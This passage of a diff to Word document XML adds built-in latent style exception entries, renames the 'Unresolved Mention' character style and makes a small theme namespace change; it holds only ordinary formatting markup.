+    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -1603,7 +1997,6 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:qFormat/>
     <w:tblPr>
       <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblCellMar>
@@ -1642,8 +2035,8 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
-    <w:name w:val="Unresolved Mention"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
+    <w:name w:val="Unresolved Mention1"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -2344,7 +2737,7 @@
   <a:extraClrSchemeLst/>
   <a:extLst>
     <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
-      <thm15:themeFamily xmlns="" xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Crop" id="{EC9488ED-E761-4D60-9AC4-764D1FE2C171}" vid="{CE19780C-D67D-4C13-9DE9-A52BC3BA51B4}"/>
+      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Crop" id="{EC9488ED-E761-4D60-9AC4-764D1FE2C171}" vid="{CE19780C-D67D-4C13-9DE9-A52BC3BA51B4}"/>
     </a:ext>
   </a:extLst>
 </a:theme>
